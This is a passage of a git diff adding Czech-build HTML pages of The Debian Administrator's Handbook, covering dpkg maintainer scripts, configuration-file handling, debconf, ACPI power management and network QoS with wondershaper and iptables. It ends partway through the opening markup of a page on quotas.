+                      class="title"><strong><span
+                          class="emphasis"><em>GOING FURTHER</em></span> The <code
+                          class="literal">Tag</code> field</strong></p></div></div></div><div
+                class="para">
+					In the <span
+                  class="pkg pkg">apt</span> example above, we can see the presence of a field that we have not yet described, the <code
+                  class="literal">Tag</code> field. This field does not describe a relationship between packages, but is simply a way of categorizing a package in a thematic taxonomy. This classification of packages according to several criteria (type of interface, programming language, domain of application, etc.) has been available for a long time. Despite this, not all packages have accurate tags and it is not yet integrated in all Debian tools; <code
+                  class="command">aptitude</code> displays these tags, and allows them to be used as search criteria. For those who are repelled by <code
+                  class="command">aptitude</code>'s search criteria, the following website allows navigation of the tag database: <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="https://wiki.debian.org/Debtags">https://wiki.debian.org/Debtags</a></div>
+				</div></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.configuration-scripts"></a>5.2.2. Configuration Scripts</h3></div></div></div><a
+            id="id-1.8.6.6.2"
+            class="indexterm"></a><a
+            id="id-1.8.6.6.3"
+            class="indexterm"></a><a
+            id="id-1.8.6.6.4"
+            class="indexterm"></a><a
+            id="id-1.8.6.6.5"
+            class="indexterm"></a><a
+            id="id-1.8.6.6.6"
+            class="indexterm"></a><div
+            class="para">
+				In addition to the <code
+              class="filename">control</code> file, the <code
+              class="filename">control.tar.gz</code> archive for each Debian package may contain a number of scripts, called by <code
+              class="command">dpkg</code> at different stages in the processing of a package. The Debian Policy describes the possible cases in detail, specifying the scripts called and the arguments that they receive. These sequences may be complicated, since if one of the scripts fails, <code
+              class="command">dpkg</code> will try to return to a satisfactory state by canceling the installation or removal in progress (insofar as it is possible).
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>GOING FURTHER</em></span> <code
+                        class="command">dpkg</code>'s database</strong></p></div></div></div><a
+              id="id-1.8.6.6.8.2"
+              class="indexterm"></a><a
+              id="id-1.8.6.6.8.3"
+              class="indexterm"></a><div
+              class="para">
+				All of the configuration scripts for installed packages are stored in the <code
+                class="filename">/var/lib/dpkg/info/</code> directory, in the form of a file prefixed with the package's name. This directory also includes a file with the <code
+                class="filename">.list</code> extension for each package, containing the list of files that belong to that package.
+			</div><div
+              class="para">
+				The <code
+                class="filename">/var/lib/dpkg/status</code> file contains a series of data blocks (in the format of the famous mail headers, RFC 2822) describing the status of each package. The information from the <code
+                class="filename">control</code> file of the installed packages is also replicated there.
+			</div></div><div
+            class="para">
+				In general, the <code
+              class="filename">preinst</code> script is executed prior to installation of the package, while the <code
+              class="filename">postinst</code> follows it. Likewise, <code
+              class="filename">prerm</code> is invoked before removal of a package and <code
+              class="filename">postrm</code> afterwards. An update of a package is equivalent to removal of the previous version and installation of the new one. It is not possible to describe in detail all the possible scenarios here, but we will discuss the most common two: an installation/update and a removal.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CAUTION</em></span> Symbolic names of the scripts</strong></p></div></div></div><div
+              class="para">
+				The sequences described in this section call configuration scripts by specific names, such as <code
+                class="command">old-prerm</code> or <code
+                class="command">new-postinst</code>. They are, respectively, the <code
+                class="command">prerm</code> script contained in the old version of the package (installed before the update) and the <code
+                class="command">postinst</code> script contained in the new version (installed by the update).
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TIP</em></span> State diagrams</strong></p></div></div></div><div
+              class="para">
+				Manoj Srivastava made these diagrams explaining how the configuration scripts are called by <code
+                class="command">dpkg</code>. Similar diagrams have also been developed by the Debian Women project; they are a bit simpler to understand, but less complete. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://people.debian.org/~srivasta/MaintainerScripts.html">https://people.debian.org/~srivasta/MaintainerScripts.html</a></div> <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://www.debian.org/doc/debian-policy/#maintainer-script-flowcharts">https://www.debian.org/doc/debian-policy/#maintainer-script-flowcharts</a></div>
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.8.6.6.12"></a>5.2.2.1. Installation and Upgrade</h4></div></div></div><a
+              id="id-1.8.6.6.12.2"
+              class="indexterm"></a><div
+              class="para">
+					Here is what happens during an installation (or an update):
+				</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="orderedlist"><ol><li
+                  class="listitem"><div
+                    class="para">
+							For an update, <code
+                      class="command">dpkg</code> calls the <code
+                      class="command">old-prerm upgrade <em
+                        class="replaceable">new-version</em></code>.
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							Still for an update, <code
+                      class="command">dpkg</code> then executes <code
+                      class="command">new-preinst upgrade <em
+                        class="replaceable">old-version</em></code>; for a first installation, it executes <code
+                      class="command">new-preinst install</code>. It may add the old version in the last parameter, if the package has already been installed and removed since (but not purged, the configuration files having been retained).
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							The new package files are then unpacked. If a file already exists, it is replaced, but a backup copy is temporarily made.
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							For an update, <code
+                      class="command">dpkg</code> executes <code
+                      class="command">old-postrm upgrade <em
+                        class="replaceable">new-version</em></code>.
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="command">dpkg</code> updates all of the internal data (file list, configuration scripts, etc.) and removes the backups of the replaced files. This is the point of no return: <code
+                      class="command">dpkg</code> no longer has access to all of the elements necessary to return to the previous state.
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="command">dpkg</code> will update the configuration files, asking the user to decide if it is unable to automatically manage this task. The details of this procedure are discussed in <a
+                      class="xref"
+                      href="sect.package-meta-information.html#sect.conffiles">5.2.3 – „Checksums, List of Configuration Files“</a>.
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							Finally, <code
+                      class="command">dpkg</code> configures the package by executing <code
+                      class="command">new-postinst configure <em
+                        class="replaceable">last-version-configured</em></code>.
+						</div></li></ol></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.8.6.6.13"></a>5.2.2.2. Package Removal</h4></div></div></div><div
+              class="para">
+					Here is what happens during a package removal:
+				</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="orderedlist"><ol><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="command">dpkg</code> calls <code
+                      class="command">prerm remove</code>.
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="command">dpkg</code> removes all of the package's files, with the exception of the configuration files and configuration scripts.
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="command">dpkg</code> executes <code
+                      class="command">postrm remove</code>. All of the configuration scripts, except <code
+                      class="filename">postrm</code>, are removed. If the user has not used the “purge” option, the process stops here.
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							For a complete purge of the package (command issued with <code
+                      class="command">dpkg --purge</code> or <code
+                      class="command">dpkg -P</code>), the configuration files are also deleted, as well as a certain number of copies (<code
+                      class="filename">*.dpkg-tmp</code>, <code
+                      class="filename">*.dpkg-old</code>, <code
+                      class="filename">*.dpkg-new</code>) and temporary files; <code
+                      class="command">dpkg</code> then executes <code
+                      class="command">postrm purge</code>.
+						</div></li></ol></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>VOCABULARY</em></span> Purge, a complete removal</strong></p></div></div></div><a
+                id="id-1.8.6.6.13.4.2"
+                class="indexterm"></a><div
+                class="para">
+					When a Debian package is removed, the configuration files are retained in order to facilitate possible re-installation. Likewise, the data generated by a daemon (such as the content of an LDAP server directory, or the content of a database for an SQL server) are usually retained.
+				</div><div
+                class="para">
+					To remove all data associated with a package, it is necessary to “purge” the package with the command, <code
+                  class="command">dpkg -P <em
+                    class="replaceable">package</em></code>, <code
+                  class="command">apt-get remove --purge <em
+                    class="replaceable">package</em></code> or <code
+                  class="command">aptitude purge <em
+                    class="replaceable">package</em></code>.
+				</div><div
+                class="para">
+					Given the definitive nature of such data removals, a purge should not be taken lightly.
+				</div></div><a
+              id="id-1.8.6.6.13.5"
+              class="indexterm"></a><div
+              class="para">
+					The four scripts detailed above are complemented by a <code
+                class="filename">config</code> script, provided by packages using <code
+                class="command">debconf</code> to acquire information from the user for configuration. During installation, this script defines in detail the questions asked by <code
+                class="command">debconf</code>. The responses are recorded in the <code
+                class="command">debconf</code> database for future reference. The script is generally executed by <code
+                class="command">apt</code> prior to installing packages one by one in order to group all the questions and ask them all to the user at the beginning of the process. The pre- and post-installation scripts can then use this information to operate according to the user's wishes.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>TOOL</em></span> <code
+                          class="command">debconf</code></strong></p></div></div></div><a
+                id="id-1.8.6.6.13.7.2"
+                class="indexterm"></a><div
+                class="para">
+					<code
+                  class="command">debconf</code> was created to resolve a recurring problem in Debian. All Debian packages unable to function without a minimum of configuration used to ask questions with calls to the <code
+                  class="command">echo</code> and <code
+                  class="command">read</code> commands in <code
+                  class="filename">postinst</code> shell scripts (and other similar scripts). But this also means that during a large installation or update the user must stay with their computer to respond to various questions that may arise at any time. These manual interactions have now been almost entirely dispensed with, thanks to the <code
+                  class="command">debconf</code> tool.
+				</div><div
+                class="para">
+					<code
+                  class="command">debconf</code> has many interesting features: it requires the developer to specify user interaction; it allows localization of all the strings displayed to users (all translations are stored in the <code
+                  class="filename">templates</code> file describing the interactions); it has different frontends to display the questions to the user (text mode, graphical mode, non-interactive); and it allows creation of a central database of responses to share the same configuration with several computers... but the most important is that it is now possible to present all of the questions in a row to the user, prior to starting a long installation or update process. The user can go about their business while the system handles the installation on its own, without having to stay there staring at the screen waiting for questions.
+				</div></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.conffiles"></a>5.2.3. Checksums, List of Configuration Files</h3></div></div></div><a
+            id="id-1.8.6.7.2"
+            class="indexterm"></a><a
+            id="id-1.8.6.7.3"
+            class="indexterm"></a><a
+            id="id-1.8.6.7.4"
+            class="indexterm"></a><a
+            id="id-1.8.6.7.5"
+            class="indexterm"></a><a
+            id="id-1.8.6.7.6"
+            class="indexterm"></a><div
+            class="para">
+				In addition to the maintainer scripts and control data already mentioned in the previous sections, the <code
+              class="filename">control.tar.gz</code> archive of a Debian package may contain other interesting files. The first, <code
+              class="filename">md5sums</code>, contains the MD5 checksums for all of the package's files. Its main advantage is that it allows <code
+              class="command">dpkg --verify</code> (which we will study in <a
+              class="xref"
+              href="sect.supervision.html#sect.dpkg-verify">14.3.3.1 – „Auditing Packages with <code
+                class="command">dpkg --verify</code>“</a>) to check if these files have been modified since their installation. Note that when this file doesn't exist, <code
+              class="command">dpkg</code> will generate it dynamically at installation time (and store it in the dpkg database just like other control files).
+			</div><div
+            class="para">
+				<code
+              class="filename">conffiles</code> lists package files that must be handled as configuration files. Configuration files can be modified by the administrator, and <code
+              class="command">dpkg</code> will try to preserve those changes during a package update.
+			</div><div
+            class="para">
+				In effect, in this situation, <code
+              class="command">dpkg</code> behaves as intelligently as possible: if the standard configuration file has not changed between the two versions, it does nothing. If, however, the file has changed, it will try to update this file. Two cases are possible: either the administrator has not touched this configuration file, in which case <code
+              class="command">dpkg</code> automatically installs the new version; or the file has been modified, in which case <code
+              class="command">dpkg</code> asks the administrator which version they wish to use (the old one with modifications, or the new one provided with the package). To assist in making this decision, <code
+              class="command">dpkg</code> offers to display a “<code
+              class="command">diff</code>” that shows the difference between the two versions. If the user chooses to retain the old version, the new one will be stored in the same location in a file with the <code
+              class="filename">.dpkg-dist</code> suffix. If the user chooses the new version, the old one is retained in a file with the <code
+              class="filename">.dpkg-old</code> suffix. Another available action consists of momentarily interrupting <code
+              class="command">dpkg</code> to edit the file and attempt to re-instate the relevant modifications (previously identified with <code
+              class="command">diff</code>).
+			</div><div
+            class="sidebar"><a
+              xmlns=""
+              id="sidebar.questions-conffiles"></a><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>GOING FURTHER</em></span> Avoiding the configuration file questions</strong></p></div></div></div><div
+              class="para">
+				<code
+                class="command">dpkg</code> handles configuration file updates, but, while doing so, regularly interrupts its work to ask for input from the administrator. This makes it less than enjoyable for those who wish to run updates in a non-interactive manner. This is why this program offers options that allow the system to respond automatically according to the same logic: <code
+                class="command">--force-confold</code> retains the old version of the file; <code
+                class="command">--force-confnew</code> will use the new version of the file (these choices are respected, even if the file has not been changed by the administrator, which only rarely has the desired effect). Adding the <code
+                class="command">--force-confdef</code> option tells <code
+                class="command">dpkg</code> to decide by itself when possible (in other words, when the original configuration file has not been touched), and only uses <code
+                class="command">--force-confnew</code> or <code
+                class="command">--force-confold</code> for other cases.
+			</div><div
+              class="para">
+				These options apply to <code
+                class="command">dpkg</code>, but most of the time the administrator will work directly with the <code
+                class="command">aptitude</code> or <code
+                class="command">apt-get</code> programs. It is, thus, necessary to know the syntax used to indicate the options to pass to the <code
+                class="command">dpkg</code> command (their command line interfaces are very similar).
+			</div><pre
+              class="screen">
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>apt -o DPkg::options::="--force-confdef" -o DPkg::options::="--force-confold" full-upgrade</code></strong></pre><div
+              class="para">
+				These options can be stored directly in <code
+                class="command">apt</code>'s configuration. To do so, simply write the following line in the <code
+                class="filename">/etc/apt/apt.conf.d/local</code> file:
+			</div><div
+              class="informalexample"><pre
+                class="programlisting">
+DPkg::options { "--force-confdef"; "--force-confold"; }
+</pre></div><div
+              class="para">
+				Including this option in the configuration file means that it will also be used in a graphical interface such as <code
+                class="command">aptitude</code>.
+			</div></div><div
+            class="sidebar"><a
+              xmlns=""
+              id="sidebar.questions-conffiles-bis"></a><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>GOING FURTHER</em></span> Force dpkg to ask configuration file questions</strong></p></div></div></div><div
+              class="para">
+				The <code
+                class="command">--force-confask</code> option requires <code
+                class="command">dpkg</code> to display the questions about the configuration files, even in cases where they would not normally be necessary. Thus, when reinstalling a package with this option, <code
+                class="command">dpkg</code> will ask the questions again for all of the configuration files modified by the administrator. This is very convenient, especially for reinstalling the original configuration file if it has been deleted and no other copy is available: a normal re-installation won't work, because <code
+                class="command">dpkg</code> considers removal as a form of legitimate modification, and, thus, doesn't install the desired configuration file.
+			</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="packaging-system.html"><strong>Předcházející</strong>Kapitola 5. Packaging System: Tools and Fundament...</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.source-package-structure.html"><strong>Další</strong>5.3. Structure of a Source Package</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.power-management.html b/tmp/cs-CZ/html/sect.power-management.html
new file mode 100644
index 000000000..8dd445225
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.power-management.html
@@ -0,0 +1,105 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">9.12. Power Management: Advanced Configuration and Power Interface (ACPI)</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="System boot, Initscripts, SSH, Telnet, Rights, Permissions, Supervision, Inetd, Cron, Backup, Hotplug, PCMCIA, APM, ACPI" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="unix-services.html"
+        title="Kapitola 9. Unix Services" /><link
+        rel="prev"
+        href="sect.hotplug.html"
+        title="9.11. Hot Plugging: hotplug" /><link
+        rel="next"
+        href="network-infrastructure.html"
+        title="Kapitola 10. Network Infrastructure" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.power-management.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.hotplug.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="network-infrastructure.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.power-management"></a>9.12. Power Management: Advanced Configuration and Power Interface (ACPI)</h2></div></div></div><a
+          id="id-1.12.15.2"
+          class="indexterm"></a><a
+          id="id-1.12.15.3"
+          class="indexterm"></a><div
+          class="para">
+			The topic of power management is often problematic. Indeed, properly suspending the computer requires that all the computer's device drivers know how to put them to standby, and that they properly reconfigure the devices upon waking. Unfortunately, there are still a few devices unable to sleep well under Linux, because their manufacturers have not provided the required specifications.
+		</div><div
+          class="para">
+			Linux supports ACPI (Advanced Configuration and Power Interface) — the most recent standard in power management. The <span
+            class="pkg pkg">acpid</span> package provides a daemon that looks for power management related events (switching between AC and battery power on a laptop, etc.) and that can execute various commands in response.
+		</div><a
+          id="id-1.12.15.6"
+          class="indexterm"></a><a
+          id="id-1.12.15.7"
+          class="indexterm"></a><a
+          id="id-1.12.15.8"
+          class="indexterm"></a><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BEWARE</em></span> Graphics card and standby</strong></p></div></div></div><div
+            class="para">
+			The graphics card driver is often the culprit when standby doesn't work properly. In that case, it is a good idea to test the latest version of the X.org graphics server.
+		</div></div><div
+          class="para">
+			After this overview of basic services common to many Unix systems, we will focus on the environment of the administered machines: the network. Many services are required for the network to work properly. They will be discussed in the next chapter.
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.hotplug.html"><strong>Předcházející</strong>9.11. Hot Plugging: hotplug</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="network-infrastructure.html"><strong>Další</strong>Kapitola 10. Network Infrastructure</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.quality-of-service.html b/tmp/cs-CZ/html/sect.quality-of-service.html
new file mode 100644
index 000000000..2bfbc53d1
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.quality-of-service.html
@@ -0,0 +1,239 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">10.3. Quality of Service</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Network, Gateway, TCP/IP, IPv6, DNS, Bind, DHCP, QoS" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="network-infrastructure.html"
+        title="Kapitola 10. Network Infrastructure" /><link
+        rel="prev"
+        href="sect.virtual-private-network.html"
+        title="10.2. Virtual Private Network" /><link
+        rel="next"
+        href="sect.dynamic-routing.html"
+        title="10.4. Dynamic Routing" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.quality-of-service.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.virtual-private-network.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.dynamic-routing.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.quality-of-service"></a>10.3. Quality of Service</h2></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.qos-principe"></a>10.3.1. Principle and Mechanism</h3></div></div></div><div
+            class="para">
+				<span
+              class="emphasis"><em>Quality of Service</em></span> (or <span
+              class="emphasis"><em>QoS</em></span> for short) refers to a set of techniques that guarantee or improve the quality of the service provided to applications. The most popular such technique involves classifying the network traffic into categories, and differentiating the handling of traffic according to which category it belongs to. The main application of this differentiated services concept is <span
+              class="emphasis"><em>traffic shaping</em></span>, which limits the data transmission rates for connections related to some services and/or hosts so as not to saturate the available bandwidth and starve important other services. Traffic shaping is a particularly good fit for TCP traffic, since this protocol automatically adapts to available bandwidth.
+			</div><a
+            id="id-1.13.6.2.3"
+            class="indexterm"></a><a
+            id="id-1.13.6.2.4"
+            class="indexterm"></a><a
+            id="id-1.13.6.2.5"
+            class="indexterm"></a><a
+            id="id-1.13.6.2.6"
+            class="indexterm"></a><div
+            class="para">
+				It is also possible to alter the priorities on traffic, which allows prioritizing packets related to interactive services (such as <code
+              class="command">ssh</code> and <code
+              class="command">telnet</code>) or to services that only deal with small blocks of data.
+			</div><div
+            class="para">
+				The Debian kernels include the features required for QoS along with their associated modules. These modules are many, and each of them provides a different service, most notably by way of special schedulers for the queues of IP packets; the wide range of available scheduler behaviors spans the whole range of possible requirements.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CULTURE</em></span> LARTC — <span
+                        class="emphasis"><em>Linux Advanced Routing &amp; Traffic Control</em></span></strong></p></div></div></div><div
+              class="para">
+				The <span
+                class="emphasis"><em>Linux Advanced Routing &amp; Traffic Control</em></span> HOWTO is the reference document covering everything there is to know about network quality of service. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.lartc.org/howto/">http://www.lartc.org/howto/</a></div>
+			</div><a
+              id="id-1.13.6.2.9.3"
+              class="indexterm"></a><a
+              id="id-1.13.6.2.9.4"
+              class="indexterm"></a><a
+              id="id-1.13.6.2.9.5"
+              class="indexterm"></a></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.qos-config"></a>10.3.2. Configuring and Implementing</h3></div></div></div><div
+            class="para">
+				QoS parameters are set through the <code
+              class="command">tc</code> command (provided by the <span
+              class="pkg pkg">iproute</span> package). Since its interface is quite complex, using higher-level tools is recommended.
+			</div><a
+            id="id-1.13.6.3.3"
+            class="indexterm"></a><a
+            id="id-1.13.6.3.4"
+            class="indexterm"></a><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.qos-wondershaper"></a>10.3.2.1. Reducing Latencies: <code
+                      class="command">wondershaper</code></h4></div></div></div><div
+              class="para">
+					The main purpose of <code
+                class="command">wondershaper</code> (in the similarly-named package) is to minimize latencies independent of network load. This is achieved by limiting total traffic to a value that falls just short of the link saturation value.
+				</div><a
+              id="id-1.13.6.3.5.3"
+              class="indexterm"></a><a
+              id="id-1.13.6.3.5.4"
+              class="indexterm"></a><a
+              id="id-1.13.6.3.5.5"
+              class="indexterm"></a><div
+              class="para">
+					Once a network interface is configured, setting up this traffic limitation is achieved by running <code
+                class="command">wondershaper <em
+                  class="replaceable">interface</em> <em
+                  class="replaceable">download_rate</em> <em
+                  class="replaceable">upload_rate</em></code>. The interface can be <code
+                class="literal">eth0</code> or <code
+                class="literal">ppp0</code> for example, and both rates are expressed in kilobits per second. The <code
+                class="command">wondershaper remove <em
+                  class="replaceable">interface</em></code> command disables traffic control on the specified interface.
+				</div><div
+              class="para">
+					For an Ethernet connection, this script is best called right after the interface is configured. This is done by adding <code
+                class="literal">up</code> and <code
+                class="literal">down</code> directives to the <code
+                class="filename">/etc/network/interfaces</code> file allowing declared commands to be run, respectively, after the interface is configured and before it is deconfigured. For example:
+				</div><div
+              class="example"><a
+                xmlns=""
+                id="example.network-interfaces"></a><p
+                class="title"><strong>Příklad 10.9. Changes in the <code
+                    class="filename">/etc/network/interfaces</code> file</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">
+iface eth0 inet dhcp
+    up /sbin/wondershaper eth0 500 100
+    down /sbin/wondershaper remove eth0
+</pre></div></div><div
+              class="para">
+					In the PPP case, creating a script that calls <code
+                class="command">wondershaper</code> in <code
+                class="filename">/etc/ppp/ip-up.d/</code> will enable traffic control as soon as the connection is up.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>GOING FURTHER</em></span> Optimal configuration</strong></p></div></div></div><div
+                class="para">
+					The <code
+                  class="filename">/usr/share/doc/wondershaper/README.Debian.gz</code> file describes, in some detail, the configuration method recommended by the package maintainer. In particular, it advises measuring the download and upload speeds so as to best evaluate real limits.
+				</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.qos-config-standard"></a>10.3.2.2. Standard Configuration</h4></div></div></div><div
+              class="para">
+					Barring a specific QoS configuration, the Linux kernel uses the <code
+                class="literal">pfifo_fast</code> queue scheduler, which provides a few interesting features by itself. The priority of each processed IP packet is based on the ToS field (<span
+                class="emphasis"><em>Type of Service</em></span>) of this packet; modifying this field is enough to take advantage of the scheduling features. There are five possible values:
+				</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+							Normal-Service (0);
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							Minimize-Cost (2);
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							Maximize-Reliability (4);
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							Maximize-Throughput (8);
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							Minimize-Delay (16).
+						</div></li></ul></div><a
+              id="id-1.13.6.3.6.4"
+              class="indexterm"></a><a
+              id="id-1.13.6.3.6.5"
+              class="indexterm"></a><div
+              class="para">
+					The ToS field can be set by applications that generate IP packets, or modified on the fly by <span
+                class="emphasis"><em>netfilter</em></span>. The following rules are sufficient to increase responsiveness for a server's SSH service:
+				</div><pre
+              class="programlisting scale">
+iptables -t mangle -A PREROUTING -p tcp --sport ssh -j TOS --set-tos Minimize-Delay
+iptables -t mangle -A PREROUTING -p tcp --dport ssh -j TOS --set-tos Minimize-Delay
+</pre></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.virtual-private-network.html"><strong>Předcházející</strong>10.2. Virtual Private Network</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.dynamic-routing.html"><strong>Další</strong>10.4. Dynamic Routing</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.quotas.html b/tmp/cs-CZ/html/sect.quotas.html
new file mode 100644
index 000000000..ae2291bd8
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.quotas.html
@@ -0,0 +1,162 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
